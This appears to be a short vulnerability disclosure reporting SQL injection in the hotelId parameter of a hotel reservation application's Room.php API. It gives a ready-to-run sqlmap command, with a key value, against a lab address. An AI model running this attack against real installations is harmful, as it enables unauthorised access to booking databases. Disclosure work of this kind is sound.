SQL Injection exists /controller/api/Room.php hotelId sqlmap -u "http://10.211.55.10/controller/api/Room.php?key=TheHotelReversationApplication&hotelId=1" <img width="933" alt="image" src="https://user-images.githubusercontent.com/29982232/67928974-3a975180-fbf7-11e9-9db2-e3801febeefa.png"> author:kejie.chen@dbappsecurity.com.cn